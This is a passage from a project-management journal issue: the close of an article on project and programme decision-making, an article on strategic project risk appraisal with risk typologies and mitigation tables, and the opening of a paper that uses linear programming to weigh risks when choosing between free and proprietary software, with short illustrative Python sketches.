several variables are added to a system or when the environment is changed and relationships quickly lose any semblance of linearity.
Finally, this dialog has highlighted the fact that the DM
processes at project and programme level differ significantly
in the timing, pacing and number of major decisions, as
well as the nature of the DM processes employed. Most
large or important project decisions are bound by the
project’s basic assumptions and project managers tend to
have a preference for deductive mental processes when
making decisions. The occurrence of large or important programme decisions seems to persist throughout the programme life cycle as they are prompted by setting the assumptions for each project when these kick off. Because
the programme delivers benefits, and these cannot be as clearly defined as products or services, its environment is not as clearly defined or bound by set basic assumptions, and inductive reasoning seems more suited to meet the programme managers’ decision-making needs.
References
[1] T. Spradlin. A Lexicon of Decision Making,
DSSResources.COM, 03/05/2004. Extracted from:
<http://dssresources.com/papers/features/spradlin/
spradlin03052004.html> on 12 Jan 2007.
[2] R.B. Sambharya. Organizational decisions in multinational corporations: An empirical study. International
Journal of Management, 11, 827-838, 1994.
[3] J. von Neumann, O. Morgenstern. Theory of games and
economic behavior. Princeton, NJ: Princeton University Press, 1947.
[4] R. Hastie, M. Dawes. Rational Choice in an Uncertain
World. Thousand Oaks, CA: Sage Publications, Inc.,
2001.
[5] PMI. A Guide to the Project Management Body of
Knowledge (PMBOK® Guide) – 4th ed., 2008.
[6] J.G. March. How decisions happen in organizations. Human-Computer Interaction, 6(2), 95-117, 1991.
[7] M. Amram, N. Kulatilaka. Real Options: Managing Strategic Investment in an Uncertain World (1st ed.). Boston, Massachusetts: Harvard Business School Press, 1999.
[8] D.A. Schön. Educating the Reflective Practitioner. London: Jossey-Bass, 1987.
[9] C. Bredillet. Knowledge management and organizational learning. In P.W.G. Morris & J.K. Pinto (Eds.),
The Wiley project management resource book. New
York, NY: John Wiley and Sons, 2004.
[10] R.M. Cyert, H.A. Simon, D.B. Trow. Observations of
a business decision. The Journal of Business, 29(4),
237-248, 1956.
[11] M.T. Pich, C.H. Loch, A. de Meyer. On Uncertainty,
Ambiguity, and Complexity in Project Management.
Management Science, Vol. 48, No. 8 (Aug., 2002),
1008-1023.
[12] M. Thiry. Combining value and project management
into an effective programme management model. International Journal of Project Management, Special Issue April 2002, 20(3), 221-228; and Proceedings of
the 4th Annual Project Management Institute-Europe
Conference [CD-ROM].
[13] M. Thiry. The development of a strategic decision management model: An analytic induction research process based on the combination of project and value management. Proceedings of the 2nd Project Management
Institute Research Conference, 482-492, 2002.
[14] Standish Group International. The CHAOS Report ,
1994. Retrieved 25 Feb 2000 from <http://www.
standishgroup.com/sample_research/chaos_1994_
1.php>.
[15] KPMG. "What went wrong? Unsuccessful information
technology projects", 1997. Retrieved 10 Mar. 2000
from <http://audit.kpmg.ca/vl/surveys/it_wrong.htm>.
[16] D. Jennings. Strategic decision making. In D. Jennings
& S. Wattam (Eds.), Decision making: An integrated
approach (2nd ed., pp. 251-282). Harlow, UK: Prentice
Hall Pearson, 1998.
[17] H. Mintzberg, D. Raisinghani, A. Théorêt. The structure of "unstructured" decision processes, Administrative Science Quarterly, June 1976, 246-275.
[18] T.J. Moore. An evolving program management maturity model: Integrating program and project management. Proceedings of the Project Management Institute’s 31st Annual Seminars & Symposium Proceedings, 2000 [CD-ROM].
[19] D. Richards. Implementing a corporate programme
office. Proceedings of the 4th Project Management Institute-Europe Conference, 2001 [CD-ROM].
[20] P. Shaw. Intervening in the shadow systems of organizations: consulting from a complexity perspective.
Journal of Organizational Change Management, 10(3),
235-250, 1997.
[21] PMCC. A Guidebook of Project and Program Management for Enterprise Innovation (P2M)-Summary
Translation, Revised Edition. Project Management
Professionals Certification Center, Japan, 2002.
[22] M. Santosus. Simple, Yet Complex, CIO Enterprise
Magazine, April 15, 1998. Retrieved 20 Jan. 2004 from
<http://www.cio.com/archive/enterprise/041598_
qanda.html>. Interview of R. Lewin and B. Regine
based on their book "Soul at Work: Complexity Theory
and Business" (published in 2000 by Simon &
Schuster).
[23] J.W. Begun. Chaos and complexity frontiers of organization science. Journal of Management Inquiry, 3(4),
329-335, 1994.
[24] M. Görög, N. Smith. Project Management for Managers, Project Management Institute, Sylva, NC, 1999.
[25] T. Grundy. Strategic project management and strategic behaviour. International Journal of Project Management, 18, 93-103, 2000.
[26] M. Lycett, A. Rassau, J. Danson. Programme management: a critical review. International Journal of project
Management, 22:289-299, 2004.
[27] M. Thiry. FOrDAD: A Program Management LifeCycle Process. International Journal of Project Management, Elseveir Science, Oxford (April, 2004) 22(3);
245-252.
[28] C.E. Lindblom. The science of muddling through. Public Administration Review, 19, 79-88, 1959.
[29] D.J. Isenberg. How senior managers think. Harvard
Business Review, Nov/Dec, 80, 1984.
[30] M. Beer. Why management research findings are
unimplementable: An action science perspective. Reflections, The SoL MIT Press-Society for Organizational Learning Journal on Knowledge, Learning and
Change, 2(3), 58-65, 2001.
[31] J. Heron, P. Reason. A participatory inquiry paradigm.
Qualitative Inquiry, 3: 274-294, 1997.
[32] OGC. Managing Successful Programmes. Eighth Impression. The Stationery Office. London, 2003.
Decisions in an Uncertain World:
Strategic Project Risk Appraisal
Elaine Harris
This article is developed from the author’s book on strategic project risk appraisal [1] and her special report on project
management for the ICAEW [2]. The book is based on over eight years of research in the area of risk and uncertainty in
strategic decision making, including a project funded by CIMA [3], and explores the strategic level risks encountered by
managers involved in different types of project. The special report classifies these using the suits from a pack of cards. This
article illustrates the key risks for three types of project including IT projects and suggests how managers can deal with
these risks. It makes a link between strategic analysis, risk assessment and project management, offering a new approach
to thinking about project risk management.
Keywords: Decisions, Managerial Judgement, Project
Appraisal, Risk, Uncertainty.
1 Investing in Projects in an Uncertain World
Projects are often thought of as a sequence of activities
with a life cycle from start to finish. One of the biggest
problems at or before the start is being able to foresee the
end, at some time in the future. Uncertainty poses a range
of issues for project planning and risk assessment. If we
think of projects as temporary endeavours, not all outcomes
may be measurable by the end, where lasting benefits may
be desirable. This poses the problem of how we judge
projects to be successful. Performance of projects has typically been measured by the three constraints of time, money
and quality. Whilst it may be easy to ascertain whether a
project is delivered on time and within budget, it is harder
to assess quality, especially when a project is first delivered. Many projects, even those that were famously late and
well over budget like the Sydney Opera House, can become
icons in society and be perceived as very successful after a
longer period of time. The classic issue in project management is that only a small minority of projects achieve success in all three measures, so academics have been searching for better ways to measure the success of projects, which
involves unpicking ‘quality’, and in whose eyes projects
are perceived to succeed or fail [2].
All strategic decisions that select which projects an organisation should invest in are taken without certain knowledge of what the future will hold and how successful the
“
This article illustrates
the key risks for three types of
project including IT projects
and suggests how managers
can deal with these risks
”
© Novática
Farewell Edition
Author
Elaine Harris is Professor of Accounting and Management and
Director of the Business School at the University of Roehampton
in London, United Kingdom. She is author of Gower Publishing’s
Strategic Project Risk Appraisal and Management and Managing
Editor of Emerald’s Journal of Applied Accounting Research
(JAAR). She chairs the Management Control Association
(MCA), a network of researchers working in the area of control
systems and human behaviour in organisations. <Elaine.Harris@
roehampton.ac.uk>
project will be. Faced with this uncertainty, we can attempt
to predict the factors that can impact on a project. Once we
can identify these factors and their possible impacts we can
call them risks and attempt to analyse and respond to them.
Risks can be both positive, such as embedded opportunities, perhaps to do more business with a new client or customer in future, or negative, things that can go wrong, and
those indeed require more focus in most risk management
processes. Project risk assessment should begin before the
organisation makes its decision about whether to undertake a project, or if faced with several options, which alternative to choose.
One common weakness in the approach that organisations take to project risk management is the failure to identify the sources of project risk early enough, before the organisation commits resources to the project (appraisal
stage). Another is not to share that risk assessment information with project managers so that they can develop suitable risk management strategies. Through action research
in a large European logistics company, a new project risk
assessment technique (Pragmatix®) has been developed to
overcome these problems. It provides an alternative method
for risk identification, ongoing risk management, project
review and learning. This technique has been applied to
eight of the most common types of projects that organisations experience.
Type of project            Characteristics
1. IT/systems dev’t        Advanced technology manufacturing or new information systems
2. Site or relocation      New building or site, relocation or site development
3. Business acquisition    Takeovers and mergers of all or part of another business
4. New product dev’t       Innovation, R & D, new products or services in established markets
5. Change e.g. closure     Decommissioning, reorganisation or business process redesign
6. Business dev’t          New customers or markets, may be defined by invitation to tender
7. Compliance              New legislation or professional standards, e.g. health & safety
8. Events                  Cultural, performing arts or sporting events, e.g. Olympics

Table 1: Types of Projects. (Source: [2, p. 4].)
2 Project Typology
Whilst the definition of a project as a temporary activity
with a start and finish implies that each project will be different in some way from previous projects, there are many
which share common characteristics. Table 1 shows the most
commonly experienced projects, informed by finance professionals in a recent survey. Each is marked with a suit
from a pack of cards which attempts to classify projects as
follows:
• Hearts – need to engage participants’ hearts and minds to succeed
• Clubs – need to work to a fixed schedule of events
• Diamonds – products need to capture the imagination and look attractive in the marketplace
• Spades – physical structures e.g. buildings, roads, bridges, tunnels
This article features three types of project (1, 2 and 6)
shown in Table 1 to give a flavour of the research findings.
3 Project Appraisal and Selection
In order to generate a suitable project proposal for this
purpose, the project needs to be scoped and alternative options may need to be developed from which the most suitable option may be selected. The way the project is defined
and described in presenting a business case for investment
can influence decision makers. It is important for senior
managers, both financial and non-financial to understand
the underlying psychological issues in managerial judgement, such as heuristics (using mental models, personal bias
and rules of thumb), framing (use of positive, negative or
emotive language in the presentation of data) and consensus (use of political lobbying and social practice to build
support for a case). These behaviours can be positively encouraged to draw on the valuable knowledge and experience of organisational members, or impact negatively, for
example status quo bias creating barriers to change [3].
In many organisations it is possible to observe bottom-up ideas being translated into approved projects by a team
at business unit level working up a business case to justify
a proposal using standard capital budgeting templates and
procedures for group board approval (Figure 1). There are
feedback loops and projects may be delayed while sufficient information is gathered, analysed and presented. This
process can take days (for example corporate events),
months (for example new client or business development)
or even years (for example new products where health and
safety features in approval such as drugs or aeroplanes).
Where delay is feasible, where the opportunity will not be
lost in competitive market situations, a real options approach
is possible. The use of the term real options here is an approach or way of thinking, not a calculable risk as in derivatives. It simply means that there is an option to delay,
disaggregate or redefine the project decision to maximise the
benefit of options, for example to build in embedded opportunities for further business. This may be more important in difficult economic times as capital may be rationed.
However, where projects are initiated by senior management in a top-down process, the usual steps in capital
investment appraisal may not be followed, as there may be
external pressure brought to bear on a chief executive or
finance director, for example in business acquisitions, strategic alliances etc. Appraisal procedures may be overridden or hijacked in such cases, with often negative consequences in terms of shareholder value. The justification for such projects is often argued on a financial basis, but evidence shows that the target company shareholders make more money out of these than those in the bidding company. This is a key risk that may be picked up by internal audit.

Figure 1: IT Project Risk Map. (Source [4].)
PROJECT RISK ATTRIBUTES          Brief Definition

CORPORATE FACTORS:
  Strategic fit                  Potential contribution to strategy
  Expertise                      Level of expertise available compared to need
  Impact                         Potential impact on company/brand reputation

PROJECT OPPORTUNITY:
  Size                           Scale of investment, time and volume of work
  Complexity                     Number of and association between assumptions
  Planning timescale             Time available to develop proposal pre-decision
  Quality of customer/supplier   Credit checking etc. added during version 4 updates

EXTERNAL FACTORS:
  Cultural fit                   Matching set of values, beliefs & practices of parties
  Quality of information         Reliability, validity & sufficiency of base data
  Demands of customer(s)         Challenge posed by specific customer requirements
  Environmental                  Likely impact of PEST factors, inc. TUPE

COMPETITIVE POSITION:
  Market strength                Power position of company in contract negotiations
  Proposed contract terms        Likely contract terms and possible risk transference

Table 2: Project Risk Attributes for Business Development Projects. (Source: adapted from [4].)
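The attribute names below are taken from Table 2, but the scores and banding thresholds are invented; the sketch only illustrates how such attributes might be rated to produce a risk profile of the kind shown in the risk maps, and is not the Pragmatix® technique itself.

```python
# Illustrative sketch: rating the Table 2 attributes to build a simple risk profile.
# Scores and banding thresholds are hypothetical; this is not the Pragmatix(R) tool.

attribute_scores = {
    # attribute: score on a 1 (low risk) .. 5 (high risk) scale, assessed at appraisal stage
    "Strategic fit": 2, "Expertise": 4, "Impact": 3,
    "Size": 4, "Complexity": 5, "Planning timescale": 3, "Quality of customer/supplier": 2,
    "Cultural fit": 3, "Quality of information": 4, "Demands of customer(s)": 5, "Environmental": 2,
    "Market strength": 3, "Proposed contract terms": 4,
}

def band(score):
    """Band an attribute the way the risk maps shade them: darker means higher risk."""
    return "high" if score >= 4 else "medium" if score == 3 else "low"

for attribute, score in attribute_scores.items():
    print(f"{attribute:30s} {score}  {band(score)}")

overall = sum(attribute_scores.values()) / len(attribute_scores)
print(f"\nOverall risk score: {overall:.1f} / 5")
```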
4 Risk Analysis
There is a common risk management framework in business organisations that can be applied to projects as well as
continuing operations. The number and labelling of steps
might differ, but the process usually involves:
1. Identify risks (where will the risk come from?)
2. Assess or evaluate risks (quantify and/or prioritise)
3. Respond to risks (take decisions e.g. avoid, mitigate
or limit effect)
4. Take action to manage risks (adopt risk management
strategies)
5. Monitor and review risks (update risk assessment
and evaluate risk strategies)
Linking these to the project life cycle, steps 1 and 2
form the risk analysis that should be undertaken during the
project initiation stage, step 3 links to the planning stage,
and steps 4 and 5 should occur during project execution.
Risks should also be reviewed as part of the project review
stage to improve project risk management knowledge and
skills for the future [2].
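As a minimal, hypothetical sketch of how the five steps might be recorded in practice, the following risk register ties identification and assessment to initiation, the response to planning, and action and review to execution; the risk, its scores and the field names are assumptions, and the mitigating action is borrowed from Table 3.

```python
# Minimal sketch of a risk register following the five steps above.
# The risk, scores and field names are hypothetical; the mitigating action is from Table 3.
import datetime

register = []

def identify(description, source):                  # step 1: where will the risk come from?
    register.append({"risk": description, "source": source,
                     "probability": None, "impact": None,
                     "response": None, "actions": [], "reviews": []})

def assess(risk, probability, impact):               # step 2: quantify and/or prioritise
    risk["probability"], risk["impact"] = probability, impact

def respond(risk, strategy):                         # step 3: avoid, mitigate or limit effect
    risk["response"] = strategy

def act(risk, action):                               # step 4: adopt risk management strategies
    risk["actions"].append(action)

def review(risk, note):                              # step 5: update assessment, evaluate strategies
    risk["reviews"].append((datetime.date.today().isoformat(), note))

identify("Loss of key staff during relocation", source="Employees")
r = register[0]
assess(r, probability=0.3, impact=4)
respond(r, "mitigate")
act(r, "Negotiate key employees' benefits package to encourage move")
review(r, "Exposure unchanged; revisit after the site decision")
print(r)
```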
Evidence from practice suggests that steps 1 and 2 are
rarely carried out early enough in the project life cycle, step
5 monitoring is often undertaken in a fairly mechanical way,
and comprehensive review at project level is hardly found
to occur at all after the project has ended, especially in non-project-based organisations.
The difficulty in identifying the risks relating to projects,
especially at an early stage when the project may not be
well defined, is that no two projects are exactly the same.
However, using the project typology in Table 1 it can be seen
that headline or strategic risks are likely to be similar for projects
of a similar type. In [9] a range of qualitative methods for
project risk identification is presented, including cognitive
mapping, and examples are given for several types of project.
Figure 2: IT Project Risk Map.
Knowledge of where the risks are likely to come from is
usually developed intuitively by managers through their
experience in the organisation and industry. Advanced methods used in the research reported here included repertory
grid¹ and cognitive mapping² techniques to elicit this valuable knowledge. However, common risks may be found in
projects of a similar type, and up to half may be identified
by applying common management techniques. These are
explained for the three project examples presented.
¹ Repertory grid technique (RGT) is a method of discovering how people subconsciously make sense of a complex topic from their range of experience. This was used to identify the project risk attributes in Table 2.
² Cognitive mapping uses a visual representation of concepts around a central theme. This was used to display risk attributes in a project risk map in Figure 2.

Source of Risk                  Mitigating actions

Employees
  Loss of staff                 Offer positive and consistent benefits package
  Loss of expertise             Negotiate key employees’ benefits package to encourage move
  Effect on morale              Good communications with staff & transparency of business case
  Poor local labour market      Establish good market intelligence (before choice of location)

Management
  Leadership                    Establish dedicated project management team with strong leader
  Continuity                    Maintain extra resources during move
  Current projects              Flex project schedules for projects spanning relocation period

Organisational impact
  Culture                       Use relocation as a catalyst for change, improve existing culture
  Business procedures           Requires a development plan

Infrastructure
  Office equipment              Transport all office equipment from current site, reduce need for new
  Capacity                      Determine capacity required and ensure building completed in time

Table 3: Mitigating Actions. (Source: adapted from unpublished MBA group coursework with permission.)
Example 1: Business Development Projects (BDP)
These projects involve securing new customers and
markets for existing products or services. The strategic analysis of the organisational and environmental context for a
BDP can help to generate several possible risks. The analysis of strengths, weaknesses, opportunities and threats
(SWOT) can identify risk areas for the organisation (corporate factors in Table 2), and help to analyse the strategic fit
of the project. Then a more detailed analysis of the external
factors, political, economic, social, technical, legal and environmental (PESTLE) can identify further risk areas (external and market factors in Table 2). The invitation to tender might also help to identify risks in a BDP project, for
example the ‘demands of the customer’ in Table 2.
Example 2: Systems Development or IT Projects
For an IT project, which is essentially a supply problem,
the chain from software supplier to client (users) via sponsor (owner) can reveal at least half of the sources of risk.
The functional requirements of the system are defined by
the client, and the risks here may determine whether the
client will be satisfied that the system does what it is supposed to do. Internal clients in IT projects may be more demanding than external clients in BDP projects.
Figure 2 shows a typical project risk map for an IT
project. The figure shows the high risk areas shaded darker
and the lower risk areas lighter. The key to managing these
risks is understanding and responding to stakeholder
motivations and expectations.
Example 3: New Site or Relocation Projects
A new site may involve the choice of location, acquisition, construction or refurbishment of buildings. In a relocation project, stakeholder analysis can reveal key groups
of people who need managing closely. The employees are
the principal group, followed by management and customers (continuity). Infrastructure risks (geographic factors) may
be revealed by PESTLE analysis. Table 3 shows how risk
management strategies can be developed to mitigate these
risks.
The final section of this article shows the analysis of
100 risk management strategies into six categories, and draws
conclusions for the use of a strategic approach to project
risk identification, assessment and management [1].
5 Risk Management Strategies
For each type of project covered in the research a set of
risk management strategies like those shown in Table 3 were
identified. These totalled 100 and the following six categories emerge from their analysis, in the order of frequency
of observation:
1: Project Management (23%)
This category includes the deployment of project management methodologies such as work breakdown structure,
scheduling, critical path analysis etc. and the establishment
of a project leader and project team, as found in the PM
body of knowledge. The most observations for this type of
risk management strategy were in IT projects, relocation
and events management, where timing is critical.
2: Human Resource Management (21%)
This category includes recruitment, training and development of personnel, including managers and the management of change in work practices. This type of strategy featured most strongly in acquisitions, IT projects and relocation.
3: Stakeholder Management (19%)
This category includes stakeholder analysis and management through consultation, relationship management and
communications. It featured most strongly in systems development projects, NPD projects and events management,
which are necessarily customer-focussed. In IT projects and
events management there are many more stakeholder groups
with diverse interests to manage.
4: Knowledge Management (18%)
This category includes searching for information, recording, analysing, sharing and documenting information,
for example in market research and feasibility studies. It
features most strongly in BDP and NPD projects and in
acquisitions. It is closely related to training and development, so overlaps with that aspect of human resource management.
5: Financial Management (10%)
This category includes credit checking of suppliers and
customers, financial modelling and budget management as
well as business valuation, pricing strategies and contract
terms. It is no surprise that it features most in business acquisitions, where a high level of financial expertise is required, and next in BDPs where terms are agreed and new
customers vetted.
6: Trials and Pilot Testing (9%)
This category includes testing ideas at the feasibility
study stage, testing possible solutions and new products.
This could be clinical trials in pharmaceuticals, tasting panels
with new food products or system testing in IT products, so
features most strongly in IT and NPD projects.
Project reviews are recommended to evaluate how well
risk management strategies have worked and to identify how
risk management can be improved as part of organisation
learning. The evaluation of Pragmatix® for risk identification, assessment and management revealed important benefits for the case organisation, not least the opportunity to
link risk assessment to later project management and post
audit review of projects. This joined up thinking links strategic choice to strategy implementation through project
management.
In conclusion, the identification of likely risks at an early
stage helps managers make better decisions in the face of
uncertainty. However, unless these risks are fully appraised
and communicated to those responsible for managing the
implementation of the project and monitoring the risks, the
full benefits of risk appraisal will not be realised.
References
[1] E. Harris. Strategic Project Risk Appraisal and Management, Farnham: Gower (Advances in Project Management series), 2009.
[2] E.P. Harris. Project Management, London: ICAEW Finance & Management special report SR33, 2011.
[3] E. Harris, C.R. Emmanuel, S. Komakech. "Managerial Judgement and Strategic Investment Decisions",
Oxford: Elsevier, 2009.
[4] E.P. Harris. "Project Risk Assessment: A European
Field Study", British Accounting Review, Vol. 31, No.
3, pp.347-371, 1999.
Selection of Project Alternatives while Considering Risks
Marta Fernández-Diego and Nolberto Munier
The selection of projects consists of choosing the most suitable out of a portfolio of projects, or the most fitting alternative when there are constraints in regard to financing, commercial, environmental, technical, capacity, location, etc. Unfortunately the selection process does not place the same importance on the various risks inherent in any project. It is possible, however, to determine quantitative values of risk for each pair of alternative/threat in order to assess these risk constraints.
Keywords: Free Software, Linear Programming,
Project, Risk Management, Threat.
1 Introduction
Failing to satisfy project objectives is a major concern
in project management. Risks can generate problems with
consequences that are not often considered, and indeed, in
many cases risk management is not even taken into account
[1]. However, the benefits of risk management are considerable. Risk management allows, at the beginning of the
project, the detection of problems that would otherwise be ignored, and so effectively helps the Project Manager in
delivering the project on time, under budget and with the
required quality [2]. However, if risk management is not
performed throughout the whole project, the Project Manager
probably will not be able to take advantage of its full benefits.
This paper proposes a methodology that consists of building, from a final value of risk for each alternative/threat pair, a decision matrix, and then determining, using Linear Programming (LP), which is the most effective alternative considering the risks. Of course, in a real case these risk constraints, plus others, can be added to the battery of constraints that address environmental, economic, technical, financial, political matters, and so on. The result will reflect the best selection on the basis of all the constraints considered simultaneously.
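As a hedged sketch of the kind of formulation described above, the example below uses one binary selection variable per alternative, a quantitative risk value for each alternative/threat pair, and per-threat risk ceilings entered as ordinary constraints. All figures and threat names are invented, and the use of scipy.optimize.linprog (SciPy 1.9 or later for the integrality option) is an assumption, since the paper does not prescribe a particular solver.

```python
# Illustrative sketch of selecting a project alternative by LP with risk constraints.
# All figures and threat names are hypothetical; the paper does not prescribe a solver.
import numpy as np
from scipy.optimize import linprog   # SciPy >= 1.9 for the integrality option

alternatives = ["Alternative 1", "Alternative 2", "Alternative 3"]
benefit = np.array([120.0, 150.0, 135.0])       # objective: benefit of each alternative

# Decision matrix: one quantitative risk value per alternative/threat pair.
risk = np.array([
    [0.20, 0.45, 0.30],    # threat A
    [0.35, 0.25, 0.40],    # threat B
    [0.15, 0.50, 0.20],    # threat C
])
risk_ceiling = np.array([0.40, 0.35, 0.45])     # maximum admissible risk per threat

res = linprog(
    c=-benefit,                                  # linprog minimizes, so negate the benefit
    A_ub=risk, b_ub=risk_ceiling,                # risk constraints, one row per threat
    A_eq=np.ones((1, 3)), b_eq=[1],              # select exactly one alternative
    bounds=[(0, 1)] * 3,
    integrality=np.ones(3),                      # binary selection variables
    method="highs",
)

best = int(np.argmax(res.x))
print(f"Selected: {alternatives[best]} (benefit {benefit[best]:.0f})")
```

Under these invented figures the second alternative has the highest benefit but breaches a risk ceiling, so the first alternative is selected; this is exactly the sense in which risk constraints are placed at the same level as the other constraints normally considered.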
The application of LP to this decision-making problem
is new in the treatment of risk. It opens a series of possibilities in the field of risk management in such a way that this
methodology represents a project’s features more accurately than other methods, solving problems with all kinds of
constraints, including those related to risk, and therefore
placing risks at the same level as the economic, social and
environmental constraints normally considered, with the idea
of raising the discipline of risk management in projects. In
short, although an even higher level of organizational maturity in terms of risk management would correspond to the
integrated risk management of the portfolio of projects, it is
expected that the outcome will be projects driven by risk
management [3].
Authors
Marta Fernández-Diego holds a European PhD in Electronic
and Telecommunications Engineering. After some research and
development contracts in universities and multinational
companies from France, Great Britain and Spain, she is currently
a lecturer in the Department of Business Organization at
Universitat Politècnica de València, Spain, where she teaches
project risk management, among other subjects. <[email protected]>.
Nolberto Munier is a Mechanical Engineer, Master in Project
Management and PhD in Design, Manufacturing and
Management of Industrial Projects. He has worked extensively
in linear programming techniques and applied them to solving
decision problems in urban projects in several cities in different
countries. In addition, he developed a methodology called Simus
for solving problems of a complex nature, with multiple
objectives and with any type of constraints. He is currently an
international consultant on issues of urban and regional planning.
<[email protected]>.
The next section presents an application example. The following section describes in detail the characteristics of the problem used to determine the choice of one alternative or the other according to various criteria, along with its constraints. Finally, once the problem is solved by LP, the results are discussed.
2 Application Example
2.1 Background
In the past decade, free software has exploded, even challenging the inertia that still exists in software engineering,
mainly derived from proprietary software, resulting in new
business models and product offerings that enable real choice
for consumers.
To understand free software, let us begin by clarifying
that the fundamental characteristic of proprietary software
is that all ownership rights therein are exclusively held by
the owner, as well as any possibility of improvement or adaptation. The user merely pays for the right to use the product, rather than buying it outright.
The problems associated with software, regardless of
whether free or proprietary, lie in its own nature. The key
problem addressed by free software is precisely the possibility of reusing it, in the logical sense that you can use parts
already coded by others and create derivatives. Any transformation of another person's work requires the authorization of the copyright holder. Instead of the simple copyright of proprietary software licenses, which means "all rights reserved", free software licenses only reserve some rights, and state whether or not the user is allowed to make copies, create derivative works such as adaptations or translations, or put the copies or derivatives to commercial use.
In contrast, the essential feature of free software is that
it is freely used [4]. Specifically, it allows the user to exercise four basic freedoms. These freedoms are:
• The freedom to run the program for any purpose,
• The freedom to study how the program works, and change it to make it do what you wish,
• The freedom to redistribute copies,
• The freedom to improve the program, and release your improvements to the user.
Open source code¹ is required to meet these freedoms. By open source code we mean that the source code is
always available with the program. In addition, the exercise of these freedoms facilitates software evolution, exposing it as much as possible to its use and change – because greater exposure means that the software receives
more testing – and by removing artificial constraints to the
evolution – being more subject to the environment.
2.2 Background of the Case: Alternatives and
Objective
Considering the future commercialization of computer
models with free software preinstalled, an entrepreneur, who
plans to start a small business, analyzes the possibility of
buying for his business computers with free software installed. Given this possibility, he needs to make a decision
between both alternatives, that is, proprietary software or
free software according to risk criteria, with the objective
consisting in minimizing the total cost, taking into account
an estimated difference of 100 € favoring a computer with
free software operating system.
¹ Text written using the format and syntax of the programming language, with instructions to be followed in order to implement the program.
Threat                  x1 (Free software)   x2 (Proprietary software)   Action   Operator   B (Threshold)
Resistance to change    0.85                 0.15                        MIN      ≥          0.15
Dependency              0.16                 0.64                        MIN      ≥          0.16
Lack of security        0.125                0.375                       MIN      ≥          0.125
Table 1: Characteristics of the Problem.
3 Problem Characteristics
The characteristics of the problem are summarized in
Table 1.
The options and constraints of the problem, reflected in
this table, are explained in the following points.
3.1 Criteria
This case raises two alternatives, effectively two projects
which will be analyzed on the basis of criteria that take into
account the various risks covered by both projects. Specifically, we consider three selection criteria that correspond to
three of the potential threats related to the software, and
which are mirrored in the main differences between free
software and proprietary software. Of course, in a real case
there may be many other criteria related to the economy,
availability and experience of personnel, environment, etc.,
but all are considered simultaneously, together with the risk
criteria. Therefore, the alternatives or options will have to
comply simultaneously with all factors.
The risk in a project involves a deviation from its objectives in terms of the three major project success criteria:
schedule, cost and functionality. In this sense, risk indicates
the probability that something can happen which endangers the project outcome.
Risk can be measured as the combination of the probability that an incident occurs and the severity of impact
[5]. Mathematically, risk can be expressed as follows:
Risk = Probability × Impact    (1)
In the certainty of the materialization of the threat, the
risk would be equal to the impact; if the probability of the
threat materialization is zero, then there is no risk at all.
However, risk is a combination of both probability and impact, and in statistics, risk is often modeled as the expected
value of some impact. This combines the probabilities of various possible threats and some assessment of the corresponding outcomes into a single value. Consequently, each alternative/threat pair contributes partially to this expected value or risk.
The threats considered, which appear as rows in Table
1, are as follows:
„ Resistance to change
It is clear that there is still a lot of inertia and reluctance
to move from the proprietary model, and despite the advantages of free software, this is the main barrier. Inertia is the
resistance of the user to give up something he knows (proprietary software), i.e. there is a resistance to change (to
free software), paralleled by inertia in the laws of physics (e.g., the resistance to initiate a movement).
Although the data are dependent on many factors including company size, the software’s purpose, its scope,
field of application, etc., 85% of small businesses would
opt for proprietary software products by inertia, lack of
knowledge about free software alternatives or simply the
fear of moving to a new field, compared with 15% who
would venture into something new. Therefore the likelihood of resistance to change for free software is higher
(85%) than the one for proprietary software (15%). On the
other hand, we consider that in both cases the impact is total, i.e. 100%, since what is at stake is the choice of one alternative or the other.
„ Dependency
A non-technical advantage of free software is its independence from the supplier, ensuring business continuity
even if the original manufacturer disappears.
Initially, free software arose in reaction to abusive practices by leading developers of proprietary software, which required users to permanently buy all updates and upgrades;
in this sense the user has their hands tied since they have
very limited rights on the product purchased. But when companies turn to free software, they liberate themselves from
the constraints imposed by the software vendor. Indeed,
free software appears to ensure the user certain freedoms.
In addition the user is dependent not only on the manufacturer, but also on the manufacturer’s related products.
The product often works best with other products from the
same manufacturer. With free software, however, users have
the power to make their own decisions.
To simplify the problem equal values of probability and
impact have been considered, resulting in a dependency
risk of 16% for free software and 64% for proprietary software.
„ Lack of security
There is a widely held belief that free software operating systems are inherently more secure than proprietary ones because of their Unix heritage, which was built specifically to provide a high degree of security. This statement can be justified as follows:
On the one hand, a coding error can potentially cause a security risk (such as problems due to lack of validation). Free software is higher quality software, since more people can see and test a set of code, improving the chance of detecting a failure and correcting it quickly. This means that quality is assured by public review of the software and by the open collaboration of a large number of people. This is why free software is less vulnerable to viruses and malicious attacks. We could estimate that the vulnerability of
free software against security issues is 25%, while for proprietary software such vulnerability amounts to 50%.
On the other hand, the impact of a security problem is
generally lower in the case of free software, because these
bugs are usually addressed with speedy fixes wherever possible, thanks to an entire global community of developers and users providing input. In contrast, in the world of proprietary software, security patches take considerably longer to resolve. We might consider impacts of 50% for free software and 75% for proprietary software.
In short, considering risk as a combination of vulnerability
and impact, the risk due to lack of security results in 12.5% for
free software versus 37.5% for proprietary software.
Furthermore, since in fact transparency hinders the introduction of malicious code, free software is usually more
secure.
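To make the arithmetic behind these figures explicit, the short sketch below (an illustration added here, not code from the paper) multiplies probability and impact for each alternative/threat pair using the values discussed in this section; the printed results are exactly the risk values collected in Table 1.

# Illustrative only: risk = probability x impact for each alternative/threat pair.
# Probabilities and impacts are the ones discussed in Section 3.1 (the 0.40/0.80
# dependency figures are implied by the stated 16% and 64% risks).
threats = {
    # threat: ((prob, impact) for free software, (prob, impact) for proprietary software)
    "Resistance to change": ((0.85, 1.00), (0.15, 1.00)),
    "Dependency":           ((0.40, 0.40), (0.80, 0.80)),
    "Lack of security":     ((0.25, 0.50), (0.50, 0.75)),
}

for threat, (free, proprietary) in threats.items():
    risk_free = free[0] * free[1]
    risk_proprietary = proprietary[0] * proprietary[1]
    print(f"{threat}: free software = {risk_free:.3f}, proprietary software = {risk_proprietary:.3f}")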
3.2 Constraints
Since in the three cases we are talking of negative events,
or threats, and we have not considered any opportunity, the
constraints that we impose on these criteria respond to minimization, effectively finding a solution greater than or equal to
the value of minimal risk, since we cannot find a solution
with lower risk than this.
For example, the opposite of resistance to change could
have been considered. The term inertia may refer to the difficulty in accepting a change. While not applying any force,
we follow our own inertia, which is an opportunity for the
favored option. In this approach, the appropriate action would have been to maximize, or find a solution less than or equal to the
maximum benefit because we cannot find a solution with
greater benefit.
4 Linear Programming Resolution
The matrix expression of the LP problem is as follows:
A · X ≥ B    (2)
where:
A is the decision matrix, shown boxed in Table 1. The components Aij of this matrix are the values of risk that each threat brings for each alternative.
